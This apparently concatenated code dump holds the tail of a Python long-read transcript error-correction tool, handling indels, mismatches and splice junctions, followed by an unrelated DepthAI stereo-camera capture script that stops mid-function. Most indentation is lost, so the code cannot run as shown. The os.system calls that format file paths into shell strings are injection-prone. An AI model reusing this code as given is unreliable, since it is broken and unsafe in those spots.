os.system('sort -u %s | bedtools sort -i - > %s' % (acceptor_file, acceptor_sorted))
splice_donor_bedtool = pybedtools.BedTool(donor_sorted)
splice_acceptor_bedtool = pybedtools.BedTool(acceptor_sorted)
# Raise a warning if there are no splice donors or acceptors
if len(splice_donor_bedtool) == 0 or len(splice_acceptor_bedtool) == 0:
warnings.warn(("Warning: No splice donors or acceptors found on "
"chromosomes: %s. If this is unexpected, check your SJ "
"annotation file." % (", ".join(read_chroms))))
return splice_donor_bedtool, splice_acceptor_bedtool, annot
def processVCF(vcf, maxLen, tmp_dir, sam_file, process = "1"):
""" This function reads in variants from a VCF file and stores them. SNPs
are stored in a dictionary by position. Indels are stored in their own
dictionary by start and end position. A pre-filtering step ensures that
variants are included only if they overlap with the input SAM reads.
        This is a space-saving measure."""
SNPs = {}
insertions = {}
deletions = {}
# Create a temporary BAM version of the input reads
tmp_bam_dir = tmp_dir + "split_uncorr_bams/"
os.system("mkdir -p %s" % (tmp_bam_dir))
bam = tmp_bam_dir + "%s_tmp_reads.bam" % (process)
try:
os.system("samtools view -bS %s > %s" % (sam_file, bam))
except Exception as e:
print(e)
raise RuntimeError(("Problem converting SAM file to BAM for variant "
"prefiltering step. Please make sure that you have "
"Samtools installed, and that your SAM "
"file is properly formatted, including a header."))
# Create a BedTool object for the VCF
try:
vcf_obj = pybedtools.BedTool(vcf)
except Exception as e:
print(e)
raise RuntimeError(("Problem reading the provided VCF file. Please make "
"sure that Bedtools is installed, and that your VCF "
"file is properly formatted, including a header. "))
# Filter the VCF file to include only those variants that overlap the reads
filtered_vcf = vcf_obj.intersect(bam, u=True, nonamecheck = True)
if len(filtered_vcf) == 0:
warnings.warn(("Warning: none of variants provided overlapped the"
"input reads."))
return SNPs, insertions, deletions
# Now parse the filtered VCF
for variant in filtered_vcf:
chrom = variant[0]
pos = int(variant[1])
ref = variant[3]
alt = variant[4].split(",")
refLen = len(ref)
# It is possible for a single position to have more than one
# type of alternate allele (ie mismatch or indel). So it is
# necessary to treat each alternate allele separately.
for allele in alt:
altLen = len(allele)
# SNP case
if refLen == altLen == 1:
ID = chrom + "_" + str(pos)
if ID not in SNPs:
SNPs[ID] = [allele]
else:
SNPs[ID].append(allele)
# Insertion/Deletion
else:
size = abs(refLen - altLen)
# Only store indels of correctable size
if size > maxLen: continue
# Positions in VCF files are one-based.
                # Insertion/deletion sequences always start with the
# preceding normal reference base
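                # Illustrative example: a 2 bp deletion recorded at VCF
                # position 100 on chr1 is keyed as "chr1_100_102" below.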
actPos = pos + 1
allele = allele[1:]
ID = "_".join([ chrom, str(pos), str(actPos + size - 1)])
if refLen - altLen < 0: # Insertion
if ID not in insertions:
insertions[ID] = [allele]
else:
insertions[ID].append(allele)
elif refLen - altLen > 0: # Deletion
deletions[ID] = 1
return SNPs, insertions, deletions
def correctInsertions(transcript, genome, variants, maxLen, logInfo):
""" Corrects insertions up to size maxLen using the reference genome.
If a variant file was provided, correction will be SNP-aware. """
logInfo.uncorrected_insertions = 0
logInfo.corrected_insertions = 0
logInfo.variant_insertions = 0
TE_entries = ""
origSeq = transcript.SEQ
origCIGAR = transcript.CIGAR
transcript_ID = transcript.QNAME
cigarOps,cigarCounts = transcript.splitCIGAR()
# Check for insertions. If none are present, we can skip this transcript
if "I" not in origCIGAR:
return TE_entries
newCIGAR = ""
newSeq = ""
MVal = 0
seqPos = 0
# Start at position in the genome where the transcript starts.
genomePos = transcript.POS
# Iterate over operations to sequence and repair insertions
for op,ct in zip(cigarOps, cigarCounts):
currPos = transcript.CHROM + ":" + str(genomePos) + "-" + \
str(genomePos + ct - 1)
if op == "M":
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
if op == "I":
ID = "_".join([transcript.CHROM, str(genomePos - 1),
str(genomePos + ct - 1)])
# Only insertions of a given size are corrected
if ct <= maxLen:
# Check if the insertion is in the optional variant catalog.
if ID in variants:
# The insertion perfectly matches a variant position.
# Leave the sequence alone if it matches an allele sequence.
currSeq = origSeq[seqPos:seqPos + ct]
if currSeq in variants[ID]:
logInfo.variant_insertions += 1
errorEntry = "\t".join([transcript_ID, ID, "Insertion",
str(ct), "Uncorrected",
"VariantMatch"])
TE_entries += errorEntry + "\n"
# Leave insertion in
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
continue
# Correct insertion
errorEntry = "\t".join([transcript_ID, ID, "Insertion", str(ct),
"Corrected", "NA"])
logInfo.corrected_insertions += 1
TE_entries += errorEntry + "\n"
# Subtract the inserted bases by skipping them.
# GenomePos stays the same, as does MVal
seqPos += ct
else: # Move on without correcting insertion because it is too big
errorEntry = "\t".join([transcript_ID, ID, "Insertion", str(ct),
"Uncorrected", "TooLarge"])
logInfo.uncorrected_insertions += 1
TE_entries += errorEntry + "\n"
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
if op == "S":
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
# N, H, and D operations are cases where the transcript sequence
# is missing bases that are in the reference genome.
if op in ["N", "H", "D"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
# Update transcript
transcript.CIGAR = newCIGAR
transcript.SEQ = newSeq
return TE_entries
def correctDeletions(transcript, genome, variants, maxLen, logInfo):
""" Corrects deletions up to size maxLen using the reference genome.
If a variant file was provided, correction will be variant-aware."""
logInfo.uncorrected_deletions = 0
logInfo.corrected_deletions = 0
logInfo.variant_deletions = 0
TE_entries = ""
transcript_ID = transcript.QNAME
chrom = transcript.CHROM
origSeq = transcript.SEQ
origCIGAR = transcript.CIGAR
cigarOps,cigarCounts = transcript.splitCIGAR()
# Check for deletions. If none are present, we can skip this transcript
if "D" not in origCIGAR:
return TE_entries
newCIGAR = ""
newSeq = ""
MVal = 0
seqPos = 0
# Start at position in the genome where the transcript starts.
genomePos = transcript.POS
# Iterate over operations to sequence and repair mismatches and microindels
for op,ct in zip(cigarOps, cigarCounts):
currPos = chrom + ":" + str(genomePos) + "-" + \
str(genomePos + ct - 1)
if op == "M":
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
if op == "D":
ID = "_".join([chrom, str(genomePos - 1), str(genomePos + ct - 1)])
if ct <= maxLen:
# Check if the deletion is in the optional variant catalog.
if ID in variants:
# The deletion perfectly matches a deletion variant. Leave the deletion in.
currSeq = genome.sequence({'chr': chrom, 'start': genomePos, 'stop': genomePos + ct - 1}, one_based=True)
errorEntry = "\t".join([transcript_ID, ID, "Deletion", str(ct), "Uncorrected", "VariantMatch"])
logInfo.variant_deletions += 1
TE_entries += errorEntry + "\n"
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
continue
# Correct deletion if we're not in variant-aware mode
errorEntry = "\t".join([transcript_ID, ID, "Deletion", str(ct), "Corrected", "NA"])
logInfo.corrected_deletions += 1
TE_entries += errorEntry + "\n"
# Add the missing reference bases
refBases = genome.sequence({'chr': chrom, 'start': genomePos, 'stop': genomePos + ct - 1}, one_based=True)
newSeq = newSeq + refBases
genomePos += ct
MVal += ct
# Deletion is too big to fix
else:
errorEntry = "\t".join([transcript_ID, ID, "Deletion", str(ct), "Uncorrected", "TooLarge"])
logInfo.uncorrected_deletions += 1
TE_entries += errorEntry + "\n"
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newCIGAR = newCIGAR + str(ct) + op
genomePos += ct
# S and I operations are cases where the transcript sequence contains bases that are not in the reference genome.
if op in ["S", "I"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
# N and H operations are cases where the transcript sequence is missing bases that are in the reference genome.
if op in ["N", "H"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
transcript.CIGAR = newCIGAR
transcript.SEQ = newSeq
transcript.NM, transcript.MD = transcript.getNMandMDFlags(genome)
return TE_entries
def correctMismatches(transcript, genome, variants, logInfo):
""" This function corrects mismatches in the provided transcript. If a
variant file was provided, correction will be variant-aware."""
logInfo.uncorrected_mismatches = 0
logInfo.corrected_mismatches = 0
TE_entries = ""
origSeq = transcript.SEQ
origCIGAR = transcript.CIGAR
origMD = transcript.MD
# Check for mismatches. If none are present, we can skip this transcript
    if not any(i in origMD.upper() for i in 'ACTGN'):
return TE_entries
newCIGAR = ""
newSeq = ""
MVal = 0
seqPos = 0
genomePos = transcript.POS
# Merge CIGAR and MD tag information so that we have the locations of all
# insertions, deletions, and mismatches
mergeOperations, mergeCounts = transcript.mergeMDwithCIGAR()
# Iterate over operations to sequence and repair mismatches and microindels
for op,ct in zip(mergeOperations, mergeCounts):
if op == "M":
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
# This denotes a mismatch
if op == "X":
# Check if the position matches a variant in the optional variant catalog.
ID = transcript.CHROM + "_" + str(genomePos)
if ID in variants:
# Mismatch position matches a known variant. If the base matches an alternative allele, do not correct it.
currBase = origSeq[seqPos]
if currBase in variants[ID]:
errorEntry = "\t".join([transcript.QNAME, ID, "Mismatch",
str(ct), "Uncorrected",
"VariantMatch"])
TE_entries += errorEntry + "\n"
logInfo.uncorrected_mismatches += 1
# Keep the base as-is
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
MVal += ct
seqPos += ct
genomePos += ct
continue
# Otherwise, correct the mismatch to reference base
errorEntry = "\t".join([transcript.QNAME, ID, "Mismatch",
str(ct), "Corrected", "NA"])
TE_entries += errorEntry + "\n"
logInfo.corrected_mismatches += 1
# Change sequence base to the reference base at this position
newSeq = newSeq + genome.sequence({'chr': transcript.CHROM,
'start': genomePos,
'stop': genomePos + ct - 1},
one_based=True)
seqPos += ct # skip the original sequence base
genomePos += ct # advance the genome position
MVal += ct
if op in ["S", "I"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
newSeq = newSeq + origSeq[seqPos:seqPos + ct]
newCIGAR = newCIGAR + str(ct) + op
seqPos += ct
if op in ["N", "H", "D"]:
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
genomePos += ct
newCIGAR = newCIGAR + str(ct) + op
# End any ongoing match
MVal, newCIGAR = endMatch(MVal, newCIGAR)
transcript.CIGAR = newCIGAR
transcript.SEQ = newSeq
# TODO: find faster way to compute
transcript.NM, transcript.MD = transcript.getNMandMDFlags(genome)
return TE_entries
def endMatch(MVal, newCIGAR):
""" Function to end an ongoing match during error correction, updating new
CIGAR and MD tag strings as needed. MVal keeps track of how many
matched bases we have at the moment so that when errors are fixed,
adjoining matches can be combined. When an intron or unfixable error
is encountered, it is necessary to end the match by outputting the
current MVal and then setting the variable to zero."""
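    # e.g. a running match of MVal = 25 is flushed to the CIGAR as "25M"
    # before the non-match operation is appended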
if MVal > 0:
newCIGAR = newCIGAR + str(MVal) + "M"
MVal = 0
return MVal, newCIGAR
def cleanNoncanonical(transcript, refs, maxDist, logInfo):
""" Iterate over each junction in the provided transcript object. If the
junction is noncanonical, attempt to correct it, and record the result.
Returns a modified transcript object that originates from a copy of the
object passed into the function, along with the error log entries.
"""
logInfo.corrected_NC_SJs = 0
logInfo.uncorrected_NC_SJs = 0
TE_entries = ""
if transcript.isCanonical == True:
return transcript, TE_entries
# Iterate over all junctions and attempt to correct
for splice_jn_num in range(0,len(transcript.spliceJunctions)):
junction = transcript.spliceJunctions[splice_jn_num]
if junction.isCanonical:
continue
else:
temp_transcript = copy(transcript)
ID = "_".join([junction.chrom, str(junction.start), str(junction.end)])
correction_status, reason, dist = attempt_jn_correction(temp_transcript,
splice_jn_num,
refs.genome,
refs.donors,
refs.acceptors,
refs.sjAnnot,
maxDist)
# If there were no problems during correction, replace the original
# transcript with the modified copy.
if correction_status == True:
transcript = temp_transcript
logInfo.corrected_NC_SJs += 1
status = "Corrected"
else:
logInfo.uncorrected_NC_SJs += 1
status = "Uncorrected"
# Update transcript error log
errorEntry = "\t".join([transcript.QNAME, ID, "NC_SJ_boundary",
str(dist), status, reason])
TE_entries += errorEntry + "\n"
return transcript, TE_entries
def find_closest_bound(sj_bound, ref_bounds):
""" Given one side of a splice junction, find the closest reference """
# Create a Bedtool object for the bound
bed_pos = pybedtools.BedTool(sj_bound.getBED(), from_string=True)
# Run Bedtools Closest operation
closest = bed_pos.closest(ref_bounds, s=True, D="ref", t="first", nonamecheck = True)[0]
# Create an object to represent the closest match
# Coordinates are 0-based since they are coming from BED
obj_closest = dstruct.Struct()
obj_closest.chrom = closest[6]
obj_closest.start = int(closest[7])
obj_closest.end = int(closest[8])
obj_closest.dist = int(closest[-1])
return obj_closest
def find_closest_ref_junction(junction, ref_donors, ref_acceptors):
""" Given a splice junction object and a splice reference, locate the
closest junction in the provided splice reference BedTool object"""
# Get the splice donor and acceptor of the junction
donor = junction.get_splice_donor()
acceptor = junction.get_splice_acceptor()
# Find the closest match for each
closest_ref_donor = find_closest_bound(donor, ref_donors)
closest_ref_acceptor = find_closest_bound(acceptor, ref_acceptors)
return closest_ref_donor, closest_ref_acceptor
def update_post_ncsj_correction(transcript, splice_jn_num, genome, sjAnnot):
""" After correcting a noncanonical splice junction, perform the
following updates:
- Reassign the position of the junction (based on its bounds)
- Recompute the splice motif and assign to junction
- Recompute NM/MD tags
- Check canonical and annotated status
"""
junction = transcript.spliceJunctions[splice_jn_num]
junction.recheckPosition()
junction.checkSpliceMotif(genome, sjAnnot)
transcript.NM, transcript.MD = transcript.getNMandMDFlags(genome)
transcript.jM, transcript.jI = transcript.get_jM_jI_tags_from_sjs()
transcript.isCanonical = transcript.recheckCanonical()
transcript.allJnsAnnotated = transcript.recheckJnsAnnotated()
return
def attempt_jn_correction(transcript, splice_jn_num, genome, ref_donors,
ref_acceptors, sjAnnot, maxDist):
""" Given a noncanonical splice junction, try to correct it by locating
a nearby annotated junction within the allowable distance.
Returns:
Corrected (True/False)
Reason for no correction ("NA"/"TooFarFromAnnotJn"/"Other")
CombinedDist
"""
junction = transcript.spliceJunctions[splice_jn_num]
# Find the closest reference junction
ref_donor, ref_acceptor = find_closest_ref_junction(junction, ref_donors,
ref_acceptors)
# Compute the overall distance of the original junction from the reference
combined_dist = combinedJunctionDist(ref_donor.dist, ref_acceptor.dist)
# Only attempt to rescue junction boundaries that are within maxDist bp of
# an annotated junction
if combined_dist > maxDist or abs(ref_donor.dist) > 2*maxDist or \
abs(ref_acceptor.dist) > 2*maxDist:
return False, "TooFarFromAnnotJn", combined_dist
try:
# Attempt to fix the splice donor side
donor = junction.get_splice_donor()
transcript.SEQ, transcript.CIGAR = fix_one_side_of_junction(transcript.CHROM,
transcript.POS, splice_jn_num,
donor, ref_donor.dist, genome,
transcript.SEQ, transcript.CIGAR)
# Attempt to fix the splice acceptor side
acceptor = junction.get_splice_acceptor()
transcript.SEQ, transcript.CIGAR = fix_one_side_of_junction(transcript.CHROM,
transcript.POS, splice_jn_num,
acceptor, ref_acceptor.dist, genome,
transcript.SEQ, transcript.CIGAR)
# Now, perform updates:
update_post_ncsj_correction(transcript, splice_jn_num, genome, sjAnnot)
except Exception as e:
return False, "Other", combined_dist
return True, "NA", combined_dist
def combinedJunctionDist(dist_0, dist_1):
"""Computes the combined genomic distance of two splice junction ends
from the closest annotated junctions. In essence, it is finding the
       size of the indel that could have created the discrepancy between the
       reference and transcript junctions.
       Examples ('|' character represents the end of an exon):
Reference: ----->| |<-----
Transcript: ----->| |<-----
dist_0 = -2, dist_1 = +2, combined dist = 4
Reference: ----->| |<-----
Transcript: ----->| |<-----
dist_0 = 0, dist_1 = +2, combined dist = 2
Reference: ----->| |<-----
Transcript: ----->| |<-----
dist_0 = +1, dist_1 = +4, combined dist = 3
"""
# If dist_0 and dist_1 have different signs, the combined distance is
# the sum of their absolute values
if dist_0*dist_1 <= 0:
combined_dist = abs(dist_0) + abs(dist_1)
else:
combined_dist = abs(abs(dist_0) - abs(dist_1))
return combined_dist
def group_CIGAR_by_exon_and_intron(CIGAR, seq):
""" Given a CIGAR string, group all of the operations by exon or intron,
resulting in one string per exon/intron. Also, subdivide the provided
sequence by exon as well."""
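    # e.g. "10M100N20M" yields exonCIGARs = ["10M", "20M"], intronCIGARs = [100],
    # and exonSeqs holding the read bases belonging to each of the two exons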
# Inits
currExonStr = ""
currExonCIGAR = ""
currSeqIndex = 0
operations, counts = splitCIGAR(CIGAR)
# Outputs
exonSeqs = []
exonCIGARs = []
intronCIGARs = []
for op, ct in zip(operations, counts):
if op == "N":
exonSeqs.append(currExonStr)
intronCIGARs.append(ct)
exonCIGARs.append(currExonCIGAR)
currExonStr = ""
currExonCIGAR = ""
elif op in [ "M", "S", "I"]:
currExonStr = currExonStr + str(seq[currSeqIndex:currSeqIndex+ct])
currExonCIGAR = currExonCIGAR + str(ct) + op
currSeqIndex += ct
else:
currExonCIGAR = currExonCIGAR + str(ct) + op
# Append last exon entries
exonSeqs.append(currExonStr)
exonCIGARs.append(currExonCIGAR)
return exonCIGARs, intronCIGARs, exonSeqs
def fix_one_side_of_junction(chrom, transcript_start, jn_number, intronBound, d,
genome, seq, oldCIGAR):
""" Corrects one side of a noncanonical splice junction by the specified
number of bases. This involves modifying the sequence and CIGAR string.
Returns modified CIGAR string and sequence
"""
# If d = 0, then the bound already matches the annotation.
if d == 0:
return seq, oldCIGAR
# First, split CIGAR by exon/intron, as well as the sequence
exonCIGARs, intronCIGARs, exonSeqs = group_CIGAR_by_exon_and_intron(oldCIGAR, seq)
# Now go and fix the specific splice junction piece
if intronBound.bound == 0:
targetExon = jn_number
exon = exonSeqs[targetExon]
if d > 0: # Need to add d bases from reference to end of exon. Case 1.
# For CIGAR string,
exonEnd = intronBound.pos - 1
seqIndex = exonEnd - transcript_start + 1
refAdd = genome.sequence({'chr': chrom, 'start': exonEnd + 1, 'stop': exonEnd + d}, one_based=True)
exonSeqs[targetExon] = exon + refAdd
intronBound.pos += d
if d < 0: # Need to subtract from end of exon sequence. Case 3
exonSeqs[targetExon] = exon[0:d]
intronBound.pos += d
intronCIGARs[jn_number] -= d
exonCIGARs[targetExon] = editExonCIGAR(exonCIGARs[targetExon], -1, d)
else:
targetExon = jn_number + 1
exon = exonSeqs[targetExon]
if d < 0: # Need to add d bases from reference to start of exon sequence. Case 2.
exonStart = intronBound.pos + 1
seqIndex = exonStart - transcript_start + 1
refAdd = genome.sequence({'chr': chrom, 'start': exonStart - abs(d), 'stop': exonStart - 1}, one_based=True)
exonSeqs[targetExon] = refAdd + exon
intronBound.pos += d
if d > 0: # Need to subtract from start of exon sequence. Case 4
exonSeqs[targetExon] = exon[d:]
intronBound.pos += d
# Modify exon string
exonCIGARs[targetExon] = editExonCIGAR(exonCIGARs[targetExon], 0, -d)
intronCIGARs[jn_number] += d
newSeq = str(''.join(exonSeqs))
# Paste together the new CIGAR string
newCIGAR = ""
for i in range(0,len(intronCIGARs)):
newCIGAR = newCIGAR + exonCIGARs[i] + str(intronCIGARs[i]) + "N"
newCIGAR = newCIGAR + exonCIGARs[-1]
if not check_seq_and_cigar_length(newSeq, newCIGAR):
raise RuntimeError("CIGAR string and sequence are not the same length")
return newSeq, newCIGAR
def check_CIGAR_validity(CIGAR):
""" Returns 'True' if CIGAR string passes tests, and "False" otherwise.
Checks to make sure that
1) Introns (N) are only ever followed by M operation
2) Introns never follow an insertion/deletion
"""
if "-" in CIGAR:
return False
operations, counts = splitCIGAR(CIGAR)
prev = ""
for op, ct in zip(operations, counts):
if prev == "N" and op != "M":
return False
if prev == "D" and op == "N":
return False
prev = op
return True
def splitCIGAR(CIGAR):
""" Takes CIGAR string from SAM and splits it into two lists: one with
capital letters (match operators), and one with the number of bases """
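    # e.g. "10M2I5M" -> (["M", "I", "M"], [10, 2, 5])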
matchTypes = re.sub('[0-9]', " ", CIGAR).split()
matchCounts = re.sub('[A-Z]', " ", CIGAR).split()
matchCounts = [int(i) for i in matchCounts]
return matchTypes, matchCounts
def editExonCIGAR(exon, side, nBases):
""" Given an exon CIGAR string, this function adds or subtracts bases from
the start (side = 0) or end (side = -1)"""
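    # e.g. editExonCIGAR("10M", side = 0, nBases = 3) extends the exon to "13M";
    # a negative nBases trims bases (and whole operations) instead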
operations, counts = splitCIGAR(exon)
if side == -1:
operations = operations[::-1]
counts = counts[::-1]
# If nBases > 0, we have an easy case. Just add the bases.
if nBases >= 0:
if operations[0] == "M":
counts[0] = counts[0] + nBases
else:
counts = [nBases] + counts
operations = ["M"] + operations
# If nBases < 0, we need to make sure we have room to delete the bases
else:
for i in range(0,len(counts)):
ct = counts[i]
remainder = ct - abs(nBases)
if remainder > 0:
counts[i] = remainder
break
elif remainder == 0:
counts[i] = ""
operations[i] = ""
break
else:
counts[i] = ""
operations[i] = ""
nBases = remainder
if side == -1:
operations = operations[::-1]
counts = counts[::-1]
result = ""
for op, ct in zip(operations, counts):
result = result + str(ct) + op
return result
def init_log_info(sam_fields):
""" Initialize a log_info struct to track the error types and correction
status for a single transcript """
transcript_id = sam_fields[0]
flag = int(sam_fields[1])
chrom = sam_fields[2]
logInfo = dstruct.Struct()
logInfo.TranscriptID = transcript_id
    # Check whether the read is unmapped, non-primary, or primary
if chrom == "*" or flag == 4:
logInfo.Mapping = "unmapped"
elif flag > 16:
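        # flag values above 16 (e.g. 256 = secondary, 2048 = supplementary)
        # are treated as non-primary alignments here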
logInfo.Mapping = "non-primary"
else:
logInfo.Mapping = "primary"
logInfo.corrected_deletions = "NA"
logInfo.uncorrected_deletions = "NA"
logInfo.variant_deletions = "NA"
logInfo.corrected_insertions = "NA"
logInfo.uncorrected_insertions = "NA"
logInfo.variant_insertions = "NA"
logInfo.corrected_mismatches = "NA"
logInfo.uncorrected_mismatches = "NA"
logInfo.corrected_NC_SJs = "NA"
logInfo.uncorrected_NC_SJs = "NA"
return logInfo
def create_log_string(logInfo):
""" Create string version of logInfo struct """
log_strings = [ str(x) for x in [logInfo.TranscriptID, logInfo.Mapping,
logInfo.corrected_deletions,
logInfo.uncorrected_deletions,
logInfo.variant_deletions,
logInfo.corrected_insertions,
logInfo.uncorrected_insertions,
logInfo.variant_insertions,
logInfo.corrected_mismatches,
logInfo.uncorrected_mismatches,
logInfo.corrected_NC_SJs,
logInfo.uncorrected_NC_SJs] ]
return "\t".join(log_strings)
def write_to_transcript_log(logInfo, tL):
""" Write a transcript log entry to output """
log_str = create_log_string(logInfo)
tL.write(log_str + "\n")
return
def dryRun(sam, options, outfiles):
"""Records all mismatches, insertions, and deletions in the transcripts,
but does not correct them """
print("Dry run mode: Identifying indels and mismatches.........")
tL = outfiles.log
eL = outfiles.TElog
genome = Fasta(options.refGenome)
sjAnnot = set()
for line in sam:
# Set up log entry for transcript
transcript, logInfo = transcript_init(line, genome, sjAnnot)
if transcript == None:
write_to_transcript_log(logInfo, tL)
continue
# For primary alignments, modify logInfo
logInfo.uncorrected_deletions = 0
logInfo.uncorrected_insertions = 0
logInfo.uncorrected_mismatches = 0
# Iterate over CIGAR to catalogue indels and mismatches
seqPos = 0
genomePos = transcript.POS
mergeOperations, mergeCounts = transcript.mergeMDwithCIGAR()
for op,ct in zip(mergeOperations, mergeCounts):
if op == "M":
seqPos += ct
genomePos += ct
if op == "X":
ID = "_".join([transcript.CHROM, str(genomePos)])
eL.write("\t".join([transcript.QNAME, ID, "Mismatch",
str(ct), "Uncorrected", "DryRun"]) + "\n")
logInfo.uncorrected_mismatches += 1
seqPos += ct
genomePos += ct
if op == "D":
ID = "_".join([transcript.CHROM, str(genomePos - 1),
str(genomePos + ct - 1)])
eL.write("\t".join([transcript.QNAME, ID, "Deletion",
str(ct), "Uncorrected", "DryRun"]) + "\n")
logInfo.uncorrected_deletions += 1
genomePos += ct
if op == "I":
ID = "_".join([transcript.CHROM, str(genomePos - 1),
str(genomePos + ct - 1)])
eL.write("\t".join([transcript.QNAME, ID, "Insertion",
str(ct), "Uncorrected", "DryRun"]) + "\n")
logInfo.uncorrected_insertions += 1
seqPos += ct
if op == "S":
seqPos += ct
if op in ["N", "H"]:
genomePos += ct
write_to_transcript_log(logInfo, tL)
return
if __name__ == '__main__':
#pr = cProfile.Profile()
#pr.enable()
main()
#pr.disable()
#pr.print_stats(sort='cumtime')
|
main.py
|
#!/usr/bin/env python3
import argparse
from pathlib import Path
from time import monotonic
from uuid import uuid4
from multiprocessing import Process, Queue
import cv2
import depthai as dai
def check_range(min_val, max_val):
def check_fn(value):
ivalue = int(value)
if min_val <= ivalue <= max_val:
return ivalue
else:
raise argparse.ArgumentTypeError(
"{} is an invalid int value, must be in range {}..{}".format(value, min_val, max_val)
)
return check_fn
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--threshold', default=0.3, type=float, help="Maximum difference between packet timestamps to be considered as synced")
parser.add_argument('-p', '--path', default="data", type=str, help="Path where to store the captured data")
parser.add_argument('-d', '--dirty', action='store_true', default=False, help="Allow the destination path not to be empty")
parser.add_argument('-nd', '--no-debug', dest="prod", action='store_true', default=False, help="Do not display debug output")
parser.add_argument('-m', '--time', type=float, default=float("inf"), help="Finish execution after X seconds")
parser.add_argument('-af', '--autofocus', type=str, default=None, help="Set AutoFocus mode of the RGB camera", choices=list(filter(lambda name: name[0].isupper(), vars(dai.CameraControl.AutoFocusMode))))
parser.add_argument('-mf', '--manualfocus', type=check_range(0, 255), help="Set manual focus of the RGB camera [0..255]")
parser.add_argument('-et', '--exposure-time', type=check_range(1, 33000), help="Set manual exposure time of the RGB camera [1..33000]")
parser.add_argument('-ei', '--exposure-iso', type=check_range(100, 1600), help="Set manual exposure ISO of the RGB camera [100..1600]")
args = parser.parse_args()
exposure = [args.exposure_time, args.exposure_iso]
if any(exposure) and not all(exposure):
raise RuntimeError("Both --exposure-time and --exposure-iso needs to be provided")
dest = Path(args.path).resolve().absolute()
dest_count = len(list(dest.glob('*')))
if dest.exists() and dest_count != 0 and not args.dirty:
raise ValueError(f"Path {dest} contains {dest_count} files. Either specify new path or use \"--dirty\" flag to use current one")
dest.mkdir(parents=True, exist_ok=True)
def create_pipeline(depth_enabled=True):
pipeline = dai.Pipeline()
rgb = pipeline.createColorCamera()
rgb.setPreviewSize(300, 300)
rgb.setBoardSocket(dai.CameraBoardSocket.RGB)
rgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
rgb.setInterleaved(False)
rgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
controlIn = pipeline.createXLinkIn()
controlIn.setStreamName('control')
controlIn.out.link(rgb.inputControl)
rgbOut = pipeline.createXLinkOut()
rgbOut.setStreamName("color")
rgb.preview.link(rgbOut.input)
if depth_enabled:
left = pipeline.createMonoCamera()
left.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
left.setBoardSocket(dai.CameraBoardSocket.LEFT)
right = pipeline.createMonoCamera()
right.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
right.setBoardSocket(dai.CameraBoardSocket.RIGHT)
depth = pipeline.createStereoDepth()
depth.initialConfig.setConfidenceThreshold(255)
median = dai.StereoDepthProperties.MedianFilter.KERNEL_7x7
depth.initialConfig.setMedianFilter(median)
depth.setLeftRightCheck(False)
depth.setExtendedDisparity(False)
depth.setSubpixel(False)
left.out.link(depth.left)
right.out.link(depth.right)
# Create output
leftOut = pipeline.createXLinkOut()
leftOut.setStreamName("left")
left.out.link(leftOut.input)
rightOut = pipeline.createXLinkOut()
rightOut.setStreamName("right")
right.out.link(rightOut.input)
depthOut = pipeline.createXLinkOut()
depthOut.setStreamName("disparity")
depth.disparity.link(depthOut.input)
return pipeline
# https://stackoverflow.com/a/7859208/5494277
def step_norm(value):
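    # e.g. with the default --threshold of 0.3, timestamps 0.31 s and 0.44 s both
    # normalize to 0.3 s, so packets that are that close in time fall into the same bucket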
return round(value / args.threshold) * args.threshold
def seq(packet):
return packet.getSequenceNum()
def tst(packet):
return packet.getTimestamp().total_seconds()
# https://stackoverflow.com/a/10995203/5494277
def has_keys(obj, keys):
return all(stream in obj for stream in keys)
class PairingSystem:
seq_streams = ["left", "right", "disparity"]
ts_streams = ["color"]
seq_ts_mapping_stream = "left"
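    # Mono/disparity packets share device sequence numbers, so they are grouped
    # by sequence number; the color preview is matched to a group through its
    # timestamp, normalized with step_norm() so small timing offsets still pair up.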
def __init__(self):
self.ts_packets = {}
self.seq_packets = {}
self.last_paired_ts = None
self.last_paired_seq = None
def add_packets(self, packets, stream_name):
if packets is None:
return
if stream_name in self.seq_streams:
for packet in packets:
seq_key = seq(packet)
self.seq_packets[seq_key] = {
**self.seq_packets.get(seq_key, {}),
stream_name: packet
}
elif stream_name in self.ts_streams:
for packet in packets:
ts_key = step_norm(tst(packet))
self.ts_packets[ts_key] = {
**self.ts_packets.get(ts_key, {}),
stream_name: packet
}
def get_pairs(self):
results = []
for key in list(self.seq_packets.keys()):
if has_keys(self.seq_packets[key], self.seq_streams):
ts_key = step_norm(tst(self.seq_packets[key][self.seq_ts_mapping_stream]))
if ts_key in self.ts_packets and has_keys(self.ts_packets[ts_key], self.ts_streams):
results.append({
**self.seq_packets[key],
